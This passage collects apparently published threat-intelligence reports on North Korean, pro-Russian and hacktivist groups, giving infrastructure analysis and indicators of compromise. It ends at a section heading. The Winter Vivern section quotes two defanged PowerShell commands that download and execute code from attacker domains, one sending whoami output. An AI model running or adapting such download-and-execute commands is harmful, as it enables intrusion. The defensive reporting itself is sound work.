OpenCarrot implements executable code in a section named .vlizer indicating the use of code virtualization for obfuscation. The .vlizer section is associated with the Oreans Code Virtualizer code protection platform, a functional subset of Themida. As previously observed in Themida-protected Lazarus group malware, some code segments of the OpenCarrot variant we analyzed are not protected.

As part of its initialization process, OpenCarrot ingests configuration data from a file whose name is composed of the service name in whose context the malware executes and the dll.mui extension. The configuration data contains encryption-protected C2 information. The use of configuration files with the dll.mui extension is a long-standing theme among Lazarus group malware, mimicking a lesser-known standard Windows file extension used to denote application resources and externalities.

OpenCarrot implements relatively long sleep time periods. To avoid remaining idle for too long whenever the user of the infected machine is active, OpenCarrot implements a mechanism to exit its sleep state earlier than instructed. If the malware is instructed to sleep for 15 seconds or more, it then monitors in 15 second intervals for the insertion of new drives, such as USBs. If such an event occurs, the malware exits its sleep state before the configured sleep time elapses. A variant of this technique has been previously observed in the Pebbledash malware.

Disk drive monitoring
Disk drive monitoring

OpenCarrot’s versatility is evident with its support of multiple methods for communicating with C2 servers. The malware dispatches commands for execution based on attacker-provided data originating not only from remote C2 servers, but also from local processes through named pipes and incoming connections to a TCP port on which OpenCarrot listens.

Infrastructure Analysis

North Korean-nexus of threat actors are known for not maintaining the OPSEC of their campaigns. A characteristic lack of segmentation allows researchers to amass unique insights across a variety of unreported activity. Infrastructure connections in particular often allow us to track the evolution of their campaigns over long periods of time.

We link the NPO Mashinostroyeniya email discussing suspicious networking communication as active C2 communications occurring through 192.169.7[.]197, and 5.134.119[.]142. The internal host, the organization’s Red Hat email server, was actively compromised and in communication with the attackers malicious infrastructure. A review of all details concludes the threat actor was likely operating on this server for an extensive period of time prior to the internal team’s discovery.

Email between NPO Mash Employees sharing beaconing process details
Email between NPO Mash Employees sharing beaconing process details

This set of malicious infrastructure was served via CrownCloud (Australia) and OhzCloud (Spain) VPS hosting providers. During the intrusion, the two domains centos-packages[.]com and redhat-packages[.]com were resolving to those C2 IP addresses. Our assessment is that this particular cluster of infrastructure became active in November 2021, and was immediately paused the same day of NPO Mashinostroyeniya’s intrusion discovery in May 2022. This finding may indicate the intrusion was high priority and closely monitored by the operators.

Infrastructure and Timeline
Infrastructure and Timeline

A relationship can be observed between this cluster of activity and a more recent ScarCruft campaign. Following the intrusion operators immediately killing their C2 server when the suspicious traffic was identified by the victim in May 2022, the centos-packages[.]com domain use was paused until it began resolving to 160.202.79[.]226 in February 2023. 160.202.79[.]226 is a QuickPacket VPS (US) hosting IP also being shared with the domain dallynk[.]com and others used by ScarCruft for malware delivery and C2 initiated through malicious documents.

Further, the domain dallynk[.]com follows the theme we’ve previously reported in which DPRK-associated threat actors impersonate Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea.

The collection of activity stemming from the dallynk[.]com domain contains malware loading tools and techniques matching those seen in previously reported ScarCruft activity using the RokRAT backdoor. Similarities in server configuration history can also link to lower-confidence BlueNoroff relationships.

Infrastructure ScarCruft Link
Infrastructure ScarCruft Link

While conducting this research, we first publicly identified the link between the JumpCloud intrusion and North Korean threat actors. One detail that immediately struck us was the domain theme similarities, such as centos-pkg[.]org / centos-repos[.]org (JumpCloud), and centos-packages[.]com (NPO Mash). This detail is superficial and not strong enough alone to base direct clustering, but alongside other aforementioned North Korean threat actor connections, it stokes our curiosity for the particulars of the threat actors’ infrastructure creation and management procedures.

Lastly, we advise particular care into how this infrastructure is further attributed when reviewed historically. For example, the C2 server IP address 192.169.7[.]197 was used between January and May 2022 by the DPRK linked threat actor; however, that same IP was used by the Arid Viper/Desert Falcon APT in 2020, first reported by Meta Threat Investigators. Arid Viper is associated with Palestinian interests, conducting activity throughout the Middle East. We assess the Arid Viper activity is unrelated to our findings and the overlap of infrastructure is simply an example of commonly reused dubious VPS hosting providers. This further highlights the importance of associating active timeframes with IP-based indicators.

Conclusion

With a high level of confidence, we attribute this intrusion to threat actors independently associated with North Korea. Based on our assessment, this incident stands as a compelling illustration of North Korea’s proactive measures to covertly advance their missile development objectives, as evidenced by their direct compromise of a Russian Defense-Industrial Base (DIB) organization.

The convergence of North Korean cyber threat actors represents a profoundly consequential menace warranting comprehensive global monitoring. Operating in unison as a cohesive cluster, these actors consistently undertake a diverse range of campaigns motivated by various factors. In light of these findings, it becomes crucial to address and mitigate this threat with utmost vigilance and strategic response.

Indicators

MD5:
9216198a2ebc14dd68386738c1c59792
6ad6232bcf4cef9bf40cbcae8ed2f985
d0f6cf0d54cf77e957bce6dfbbd34d8e
921aa3783644750890b9d30843253ec6
99fd2e013b3fba1d03a574a24a735a82
0b7dad90ecc731523e2eb7d682063a49
516beb7da7f2a8b85cb170570545da4b

SHA1:
07b494575d548a83f0812ceba6b8d567c7ec86ed
2217c29e5d5ccfcf58d2b6d9f5e250b687948440
246018220a4f4f3d20262b7333caf323e1c77d2e
8b6ffa56ca5bea5b406d6d8d6ef532b4d36d090f
90f52b6d077d508a23214047e680dded320ccf4e
f483c33acf0f2957da14ed422377387d6cb93c4d
f974d22f74b0a105668c72dc100d1d9fcc8c72de

redhat-packages[.]com
centos-packages[.]com
dallynk[.]com
yolenny[.]com
606qipai[.]com
asplinc[.]com
bsef.or[.]kr

192.169.7[.]197
160.202.79[.]226
96.9.255[.]150
5.134.119[.]142

JumpCloud Intrusion | Attacker Infrastructure Links Compromise to North Korean APT Activity

By: Tom Hegel
20 July 2023 at 10:00

In recent news, the cloud-based IT management service JumpCloud publicly shared details gathered from the investigation into an intrusion on their network. Alongside the updated details, the organization shared a list of associated indicators of compromise (IOCs), noting attribution to an unnamed “sophisticated nation-state sponsored threat actor”.

Reviewing the newly released indicators of compromise, we associate the cluster of threat activity to a North Korean state sponsored APT. The IOCs are linked to a wide variety of activity we attribute to DPRK, overall centric to the supply chain targeting approach seen in previous campaigns.

Infrastructure Analysis

Based on the IOCs shared by JumpCloud, we were able to analyze the threat actor’s infrastructure. The following list is our starting point:

Domains

alwaysckain.com canolagroove.com centos-pkg.org
centos-repos.org datadog-cloud.com datadog-graph.com
launchruse.com nomadpkg.com nomadpkgs.com
primerosauxiliosperu.com reggedrobin.com toyourownbeat.com
zscaler-api.org

IP Addresses

51.254.24.19 185.152.67.39 70.39.103.3
66.187.75.186 104.223.86.8 100.21.104.112
23.95.182.5 78.141.223.50 116.202.251.38
89.44.9.202 192.185.5.189 162.241.248.14
179.43.151.196 45.82.250.186 162.19.3.23
144.217.92.197 23.29.115.171 167.114.188.40
91.234.199.179

By mapping out this infrastructure, it is possible to show the links between the diverse set of IP addresses and pick up various patterns.

Triggering alerts on 192.185.5[.]189 alone is ill advised, as it’s a shared hosting server for many domains and not an indicator of malicious activity by itself. However, toyourownbeat[.]com shares an SSL certificate with skylerhaupt[.]com, indicating a potential relationship in owner.

The indicator 144.217.92[.]197 shared by JumpCloud does not host any domains from the list they shared, but we can see one similar through the use of passive DNS data: npmaudit[.]com, which was also just recently shared by GitHub in an alert of their own.

Based on public details available as of this writing, it’s unclear if the GitHub alert originated from the JumpCloud incident or if they are separate efforts by the same attacker.

Infrastructure Map Noting JumpCloud links
Infrastructure Map Noting JumpCloud links

Moving on to IP address 23.29.115[.]171, we can see through PDNS data that the domain npm-pool[.]org is related. Notably, this domain is quite similar to the NPM theme of domains shared in the GitHub alert.

Infrastructure Map Noting JumpCloud and GitHub Overlap
Infrastructure Map Noting JumpCloud and GitHub Overlap

While the following is not a strong indicator of attribution alone, it’s noteworthy that specific patterns in how the domains are constructed and used follow a similar pattern to other DPRK linked campaigns we track. Indicators with suspected actor association, but unverified as of this writing, include junknomad[.]com and insatageram[.]com (registered with jeanettar671belden[@]protonmail[.]com).

Additional pivots of potential interest can be made through other IPs, including 167.114.188[.]40, and to a variety of low confidence attacker-associated infrastructure.

Following the profile of the associated infrastructure from both the JumpCloud intrusion and the GitHub security alert, we can expand to further associated threat activity. For example, we can see clear links to other NPM and “package” themed infrastructure we associate with high to medium confidence, as noted in the list below. This list further expands thanks to the findings and blog from Phylum in late June.

npmjscloud[.]com
npmcloudjs[.]com
nodepkg[.]com
dadiwarm[.]com
216.189.145[.]247
npmjsregister[.]com
142.44.178[.]222
tradingprice[.]net
bi2price[.]com

Trivial pivots from here can be made to similar behaving infrastructure linked to TraderTraitor, as noted by GitHub, plus those of AppleJeus such as Celas Trade Pro via celasllc[.]com.

Conclusion

It is evident that North Korean threat actors are continuously adapting and exploring novel methods to infiltrate targeted networks. The JumpCloud intrusion serves as a clear illustration of their inclination towards supply chain targeting, which yields a multitude of potential subsequent intrusions. The DPRK demonstrates a profound understanding of the benefits derived from meticulously selecting high-value targets as a pivot point to conduct supply chain attacks into fruitful networks.

Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign

By: Tom Hegel
4 May 2023 at 13:55

By Tom Hegel and Aleksandar Milenkoski

Executive Summary

  • SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe.
  • Ongoing campaigns use a new malware component we call ReconShark, which is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros.
  • ReconShark functions as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a wider set of activity we confidently attribute to North Korea.

Background

Kimsuky is a North Korean advanced persistent threat (APT) group with a long history of targeted attacks across the world. Current understanding of the group indicates they are primarily assigned to intelligence collection and espionage operations in support of the North Korean government since at least 2012. In 2018 the group was observed deploying a malware family dubbed BabyShark, and our latest observations indicate the group has evolved the malware with an expanded reconnaissance capability – we refer to this BabyShark component as ReconShark.

Targeted Organizations

Historically, Kimsuky targets have been located across countries in North America, Asia, and Europe. In the groups latest campaigns, they continue their global targeting themed around various ongoing geopolitical topics. For example, the latest Kimsuky campaigns have focused on nuclear agendas between China and North Korea, relevant to the ongoing war between Russia and Ukraine.

In a recent campaign Kimsuky targeted the staff of Korea Risk Group (KRG), the information and analysis firm specializing in matters directly and indirectly impacting the Democratic People’s Republic of Korea (DPRK). We applaud KRG’s willingness to publicly share our analysis of attacks against them so the wider cybersecurity community can use this intelligence for expanded understanding of the Kimsuky threat actor and their own hunting and detection efforts. Our assessment is that the same campaign has been used to continue targeting other organizations and individuals in at least the United States, Europe, and Asia, including think tanks, research universities, and government entities.

Initial Access Targeting

For the deployment of ReconShark, Kimsuky continues to make use of specially crafted phishing emails. Notably, the spear-phishing emails are made with a level of design quality tuned for specific individuals, increasing the likelihood of opening by the target. This includes proper formatting, grammar, and visual clues, appearing legitimate to unsuspecting users. Notably, the targeted emails, which contain links to download malicious documents, and the malicious documents themselves, abuse the names of real individuals whose expertise is relevant to the lure subject such as Political Scientists.

In the malicious emails, Kimsuky entices the target to open a link to download a password-protected document. Most recently, they made use of Microsoft OneDrive to host the malicious document for download. For example, as used against KRG, the lure email contained the OneDrive shared file link:

1drv[.]ms/u/s!AvPucizxIXoqedcUKN647svN3QM?e=K6N1gT

The file downloaded is a password protected .doc file named “Research Proposal-Haowen Song.doc” (SHA1: 86a025e282495584eabece67e4e2a43dca28e505) which contains a malicious macro (SHA1: c8f54cb73c240a1904030eb36bb2baa7db6aeb01)

Malicious Document, themed to DPRK / China
Malicious Document, themed to DPRK / China

ReconShark: A New BabyShark Reconnaissance Variant

The lure documents Kimsuky distributes contain Microsoft Office macros that activate on document close. Based on overlaps in file naming conventions, used malware staging techniques, and code format, we assess that the macros implement a newer variant of a reconnaissance capability of the Kimsuky’s BabyShark malware seen targeting entities in the Korean peninsula towards the end of 2022. We refer to this BabyShark component as ReconShark.

The ability of ReconShark to exfiltrate valuable information, such as deployed detection mechanisms and hardware information, indicates that ReconShark is part of a Kimsuky-orchestrated reconnaissance operation that enables subsequent precision attacks, possibly involving malware specifically tailored to evade defenses and exploit platform weaknesses.

Information Exfiltration

The main responsibility of ReconShark is to exfiltrate information about the infected platform, such as running processes, information about the battery connected to the system, and deployed endpoint threat detection mechanisms.

Similar to previous BabyShark variants, ReconShark relies on Windows Management Instrumentation (WMI) to query process and battery information.

ReconShark queries process and battery information
ReconShark queries process and battery information

ReconShark checks for the presence of a broad set of processes associated with detection mechanisms, such as ntrtscan.exe (Trend Micro OfficeScan), mbam.exe (Malwarebytes Anti-Malware), NortonSecurity.exe (Norton Security), and avpui.exe (Kaspersky Internet Security).

Enumeration of deployed detection mechanisms
Enumeration of deployed detection mechanisms

In contrast to previous BabyShark variants, ReconShark exfiltrates information without first storing it on the filesystem – the malware stores the information it collects in string variables and then uploads them to the C2 server by issuing HTTP POST requests.

ReconShark exfiltrates information
ReconShark exfiltrates information

Payload Deployment

In addition to exfiltrating information, ReconShark deploys further payloads in a multi-stage manner that are implemented as scripts (VBS, HTA, and Windows Batch), macro-enabled Microsoft Office templates, or Windows DLL files. ReconShark decides what payloads to deploy depending on what detection mechanism processes run on infected machines.

Some ReconShark strings are encrypted using a relatively simple cipher to evade static detection mechanisms. These strings are typically commands or scripts for downloading and/or executing payloads.

A decrypted command
A decrypted command

ReconShark deploys and executes payloads in different ways. For example, the malware can directly download a payload from the C2 server using the curl utility, but also use Windows Shortcut (LNK files) or Office templates for that purpose.

ReconShark edits Windows Shortcuts (LNK files) to the msedge.exe (Microsoft Edge), chrome.exe (Google Chrome), outlook.exe (Office Outlook), whale.exe (Whale browser), and firefox.exe (Mozilla Firefox) applications. When executed, these LNK files start the linked legitimate applications and execute malicious code at the same time.

Further, ReconShark replaces the default %AppData%\Microsoft\Templates\Normal.dotm Office template, which opens whenever a user starts Microsoft Word, with a malicious Office template hosted at the C2 server. This effectively compromises the execution of Microsoft Word.


ReconShark edits LNK files (top) and deploys a malicious Normal.dotm Office template (bottom)
ReconShark edits LNK files (top) and deploys a malicious Normal.dotm Office template (bottom)

The payload staging ends with Windows Batch or VBS scripts that create the %AppData%\1 file with a content of ss or sss. These files may represent markers of a successful ReconShark execution.

A third-stage ReconShark payload
A third-stage ReconShark payload

Infrastructure Analysis

All observed infrastructure in this campaign are hosted on a shared hosting server from NameCheap, whom we’ve already notified of this malicious activity and recommended takedowns. Kimsuky operators continually made use of LiteSpeed Web Server (LSWS) for managing the malicious functionality.

Kimsuky LiteSpeed Web Server Portal
Kimsuky LiteSpeed Web Server Portal

Phishing emails have been observed sending from the yonsei[.]lol domain, while rfa[.]ink and mitmail[.]tech are used for command and control. The domain yonsei[.]lol has been active since December 2022, with malicious activity occurring as recently as this week. rfa[.]ink has been actively used since early February 2023, and mitmail[.]tech since mid January 2023. Kimsuky also made use of newshare[.]online as a C2 server for a short time at the end of 2022.

As shown in the ReconShark macro example, beacons are made to the /bio/ directory of rfa[.]ink. During our analysis of the activity, the attacker made multiple attempts at renaming that directory, including /bio433ertgd12/ then later /bio234567890rtyui/, and a day later returning back to /bio/.

This may have been an attempt to hinder research efforts, or pause the intake of new victims for unknown reasons. The IOC table below highlights each of the URL paths Kimsuky manages across each C2 domain and their specific purpose according to the execution flow in the macro. These patterns match across domains, while the directory they are placed in often varies. Attempted navigation to some paths on C2 domains are configured to redirect visitors to the legitimate Microsoft website.

As with most malicious infrastructure linked to North Korean actors, we can quickly find links back to previous reporting or separate campaigns. For example, links can be found to the domains mainchksrh[.]com and com-change[.]info, with indications com-change was used in 2020-2022 credential phishing campaigns at these subdomains:

aaaaawwqwdqkidoemsk.lives.com-change[.]info
accounts.live.com-change[.]info
accounts.lives.com-change[.]info
cashsentinel.com-change[.]info
cashsentinel.hotmail.com-change[.]info
cashsentinel.hotrnail.com-change[.]info
cashsentinel.live.com-change[.]info
cashsentinel.lives.com-change[.]info
cashsentinel.microsoft.com-change[.]info
cashsentinel.naver.com-change[.]info
cashsentinel.navers.com-change[.]info
cashsentinel.navor.com-change[.]info
cashsentinel.outlock.com-change[.]info
cashsentinel.outlook.com-change[.]info
cloud.navor.com-change[.]info
downmail.navor.com-change[.]info
gmail.com-change[.]info
grnail.com-change[.]info
hotmail.com-change[.]info
hotrnail.com-change[.]info
live.com-change[.]info
lives.com-change[.]info
loges.lives.com-change[.]info
loginsaa.gmail.com-change[.]info
loginsaa.grnail.com-change[.]info
logmes.lives.com-change[.]info
logrns.lives.com-change[.]info
logws.lives.com-change[.]info
microsoft.com-change[.]info
microsoft.loginsaa.gmail.com-change[.]info
microsoft.loginsaa.grnail.com-change[.]info
naver.com-change[.]info
naver.loginsaa.gmail.com-change[.]info
navers.com-change[.]info
navor.com-change[.]info
nlds.navor.com-change[.]info
outlock.com-change[.]info
outlook.com-change[.]info
paypal.com-change[.]info
publiccloud.navor.com-change[.]info
skjflkjsjflejlkjieiieieiei.lives.com-change[.]info

Conclusion

The ongoing attacks from Kimsuky and their use of the new reconnaissance tool, ReconShark, highlight the evolving nature of the North Korean threat landscape. Organizations and individuals need to be aware of the TTPs used by North Korea state-sponsored APTs and take necessary precautions to protect themselves against such attacks. The link between recent activity and a wider set of previously unknown activity attributed to North Korea underscores the need for continued vigilance and collaboration.

Indicators of Compromise

Indicator Description
yonsei[.]lol Phishing Email Sender Domain
https[:]//rfa[.]ink/bio/r.php https[:]//mitmail.tech/gorgon/r.php C2 server endpoint.
https[:]//rfa[.]ink/bio/t1.hta https[:]//mitmail[.]tech/gorgon/t1.hta ReconShark payload: HTA script.
https[:]//rfa[.]ink/bio/ca.php?na=reg.gif https[:]//mitmail.tech/gorgon/ca.php?na=reg.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=secur32.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=secur32.gif https[:]//newshare[.]online/lee/ca.php?na=secur32.gif ReconShark payload: DLL file.
https[:]//rfa[.]ink/bio/ca.php?na=dot_eset.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_eset.gif ReconShark payload: Office template.
https[:]//rfa[.]ink/bio/ca.php?na=video.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=video.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=start2.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start2.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=start4.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start4.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=start3.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start3.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=videop.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=videop.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=start1.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start1.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=vbs_esen.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=vbs_esen.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=start0.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=start0.gif ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink /bio/d.php?na=vbtmp ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/ca.php?na=vbs.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=vbs.gif ReconShark payload: VBS script.
https[:]//rfa[.]ink/bio/d.php?na=battmp ReconShark payload: Windows Batch script.
https[:]//rfa[.]ink/bio/ca.php?na=dot_v3.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_v3.gif ReconShark payload: Office template.
https[:]//rfa[.]ink/bio/ca.php?na=dot_esen.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_esen.gif ReconShark payload: Office template.
http[:]//rfa[.]ink/bio/ca.php?na=dot_avg.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_avg.gif ReconShark payload: Office template.
https[:]//rfa[.]ink/bio/ca.php?na=dot_kasp.gif https[:]//mitmail[.]tech/gorgon/ca.php?na=dot_kasp.gif ReconShark payload: Office template.
86a025e282495584eabece67e4e2a43dca28e505 Lure Doc Example – SHA1
c8f54cb73c240a1904030eb36bb2baa7db6aeb01 Macro – SHA1

Winter Vivern | Uncovering a Wave of Global Espionage

By: Tom Hegel
16 March 2023 at 09:55

Executive Summary

  • SentinelLabs has conducted an investigation into Winter Vivern Advanced Persistent Threat (APT) activity, leveraging observations made by The Polish CBZC and Ukraine CERT. Our research has uncovered a previously unknown set of espionage campaigns and targeting activities conducted by this threat actor.
  • Our analysis indicates that Winter Vivern’s activities are closely aligned with global objectives that support the interests of Belarus and Russia’s governments. The APT has targeted a variety of government organizations, and in a rare instance, a private telecommunication organization.
  • The threat actor employs various tactics, such as phishing websites, credential phishing, and deployment of malicious documents, that are tailored to the targeted organization’s specific needs. This results in the deployment of custom loaders and malicious documents, which enable unauthorized access to sensitive systems and information.

Background on Winter Vivern

The Winter Vivern Advanced Persistent Threat (APT) is a noteworthy yet relatively underreported group that operates with pro-Russian objectives. DomainTools initially publicized the group in early 2021, naming it based on an initial command-and-control beacon URL string “wintervivern,” which is no longer in use. Subsequently, Lab52 shared additional analysis several months later, identifying new activity associated with Winter Vivern.

The group has avoided public disclosure since then, until recent attacks targeting Ukraine. A part of a Winter Vivern campaign was reported in recent weeks by the Polish CBZC, and then the Ukraine CERT as UAC-0114. In this activity, CERT-UA and the CBZC collaborated on the release of private technical details which assisted in our research to identify a wider set of activity on the threat actor, in addition to new victims and previously unknown specific technical details. Overall, we find that the Winter Vivern APT is a resource-limited but highly creative group that shows restraint in the scope of their attacks. Our analysis indicates that Winter Vivern activity aligns closely with global objectives that support the interests of Belarus and Russia’s governments.

Targeted Organizations

Our analysis of Winter Vivern’s past activity indicates that the APT has targeted various government organizations since 2021, including those in Lithuania, India, Vatican, and Slovakia.

Recently linked campaigns reveal that Winter Vivern has targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government. Of particular interest is the APT’s targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war.

The threat actor’s targeting of a range of government and private entities highlights the need for increased vigilance as their operations include a global set of targets directly and indirectly involved in the war.

Luring Methodology

Winter Vivern’s tactics have included the use of malicious documents, often crafted from authentic government documents publicly available or tailored to specific themes. More recently, the group has utilized a new lure technique that involves mimicking government domains to distribute malicious downloads.

In early 2023, Winter Vivern targeted specific government websites by creating individual pages on a single malicious domain that closely resembled those of Poland’s Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Security Service of Ukraine.

Malicious Page Mimicking cbzc.policja.gov.pl
Malicious Page Mimicking cbzc.policja.gov.pl

In mid 2022 the attackers also made an interesting, lesser observed, use of government email credential phishing webpages. One example is ocspdep[.]com, which was used in targeting users of the Indian government’s legitimate email service email.gov.in.

email.gov.in Login Page
email.gov.in Login Page

Looking back at less recent activity, we can see in December 2022 the group likely targeted individuals associated with the Hochuzhit.com (“I Want to Live”) project, the Ukraine government website offering guidance and instructions to Russian and Belarus Armed Forces seeking to voluntarily surrender in the war. In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.

When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits, and the abuse of legitimate Windows tools.

View Into The Arsenal

Winter Vivern APT falls into a category of scrappy threat actors, being quite resourceful and able to accomplish a lot with potentially limited resources while willing to be flexible and creative in their approach to problem-solving.

Recent campaigns demonstrate the group’s use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.

Fake Virus Scan Loaders
Fake Virus Scan Loaders

In the case of malicious documents, such as the Hochu Zhit themed XLS files, PowerShell is called through a macro. Specifically, Invoke-Expression cmdlet is executed, beaconing to the malicious destination of ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php.

powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')"

One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample. We identified a related sample following similar use, although it is less complete in malicious design. These samples align with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script loaders. Known samples are PE32 executables, written in Visual C++, with a compilation timestamp of May 2021. We assess the threat actor shifted from these original executables to the delivery of batch files with PowerShell scripting, with overlap in their use.

f39b260a9209013d9559173f12fbc2bd5332c52a C:\Users\user_1\source\repos\Aperitivchick\Release\SystemProtector.pdb
a19d46251636fb46a013c7b52361b7340126ab27 C:\Users\user_1\source\repos\Aperitivchick 2\Release\SystemProtector.pdb

APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com. As with the previous script, the trojan makes use of whomami within PowerShell in its initial activity to beacon outbound for further instructions and/or downloads.

actor-controlled.exe -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; 
$a=whoami; 
iex (New-Object Net.WebClient).DownloadString("""hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php?idU=$a""")"

APERETIF also uses the signatures.php?id=1 URI through HTTPS GET requests. The group made use of compromised WordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the download location for APERETIF during initial attack stages.

Moreover, Winter Vivern employs other intrusion techniques, such as exploiting application vulnerabilities to compromise specific targets or staging servers. An attacker-controlled server was found to host a login page for the Acunetix web application vulnerability scanner, which may serve as a supplementary resource for scanning target networks and potentially used to compromise WordPress sites for malware hosting purposes.

Acunetix Vulnerability Scanner Login
Acunetix Vulnerability Scanner Login

Conclusion

The Winter Vivern cyber threat actor, whose operations of espionage have been discussed in this research, has been able to successfully carry out their attacks using simple yet effective attack techniques and tools. Their ability to lure targets into the attacks, and their targeting of governments and high-value private businesses demonstrate the level of sophistication and strategic intent in their operations. The dynamic set of TTPs and their ability to evade the public eye has made them a formidable force in the cyber domain.

Indicators of Compromise

Type Indicator
Domain bugiplaysec[.]com
Domain marakanas[.]com
Domain mfa_it_sec@outlook[.]com
Domain ocs-romastassec[.]com
Domain ocspdep[.]com
Domain security-ocsp[.]com
Domain troadsecow[.]com
URL hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i
URL hxxps://marakanas[.]com/Kkdn7862Jj6h2oDASGmpqU4Qq4q4.php
URL hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o
URL hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php
IP 176.97.66[.]57
IP 179.43.187[.]175
IP 179.43.187[.]207
IP 195.54.170[.]26
IP 80.79.124[.]135
File SHA1 0fe3fe479885dc4d9322b06667054f233f343e20
File SHA1 83f00ee38950436527499769db5c7ecb74a9ea41
File SHA1 a19d46251636fb46a013c7b52361b7340126ab27
File SHA1 a574c5d692b86c6c3ee710af69fccbb908fe1bb8
File SHA1 c7fa6727fe029c3eaa6d9d8bd860291d7e6e3dd0
File SHA1 f39b260a9209013d9559173f12fbc2bd5332c52a

NoName057(16) – The Pro-Russian Hacktivist Group Targeting NATO

By: Tom Hegel
12 January 2023 at 10:55

By Tom Hegel and Aleksandar Milenkoski

Executive Summary

  • Pro-Russia hacktivist group NoName057(16) is conducting a campaign of DDoS attacks on Ukraine and NATO organizations that began in the early days of the war in Ukraine. Targets have included government organizations and critical infrastructure.
  • NoName057(16) was responsible for disrupting services across the financial sector of Denmark this week. Other recent attacks include organizations and businesses across Poland, Lithuania and others.
  • On January 11th, we observed NoName057(16) begin targeting 2023 Czech presidential election candidates’ websites.
  • SentinelLabs has identified how the group operates over public Telegram channels, a volunteer-fueled DDoS payment program, a multi-OS supported toolkit, and GitHub.

What is NoName057(16)

NoName057(16), also known as NoName05716, 05716nnm or Nnm05716, is a relatively underreported hacktivist group supporting Russia since March 2022, alongside Killnet and other pro-Russian groups. In December 2022, the group was responsible for disrupting the Polish government website. As noted by the Polish government, the incident was in response to the Sejm of the Republic of Poland officially recognizing Russia as a state sponsor of terrorism in mid December 2022. More recently, the group targeted the Danish financial sector, impacting leading financial institutions as reported by Reuters.

Motivations and Objectives

The NoName057(16) group is primarily focused on disrupting websites important to nations critical of Russia’s invasion of Ukraine. Distributed Denial of Service (DDoS) attacks act as the method to conduct such disruption efforts.

Initial attacks focused on Ukrainian news websites, while later shifting to NATO associated targets. For example, the first disruption the group claimed responsibility for were the March 2022 DDoS attacks on Ukraine news and media websites Zaxid, Fakty UA, and others. Overall the motivations center around silencing what the group deems to be anti-Russian.

Operating Methods – Telegram Channel

NoName057(16) operate through Telegram to claim responsibility for their attacks, mock targets, make threats, and generally justify their actions as a group. Interestingly, NoName057(16) makes attempts to teach their followers through educational content such as explaining basic industry jargon and attack concepts.

With an average of six posts per day, the overall engagement of NoName057(16)’s Telegram efforts has slowly declined over time. Peak viewership of their posts occurred in July 2022, when they reached approximately 14,000 readers with nearly 100% engagement rate. Today, daily average reach is roughly 2-3,000 and engagement in the range of 10-20%, signifying that the group is becoming less relevant to their followers and to Telegram users as a whole. This may be explained in part by the fact that many similar hacktivist groups exist, have gained more attention, and are often more impactful in their objectives.

Views and engagement rate of NoName057(16) Telegram Posts (telemetr.io)
Views and engagement rate of NoName057(16) Telegram Posts (telemetr.io)

Evidence from NoName057(16)’s Telegram channel indicates that the group values the recognition their attacks achieve through being referenced online including in Wikipedia articles. The channel also posts pro-Russian memes, motivational posts, and general status updates around the holidays. The observed Telegram activity makes it clear that the group considers itself a top tier Russian threat actor when in reality the impact of their DDoS attacks is short-lived disruption with little to no wider consequence.

 NoName057(16) New Year Update
[caption] NoName057(16) New Year Update

We have reported the associated accounts/channels to the Telegram Abuse team.

Tool Hosting on GitHub

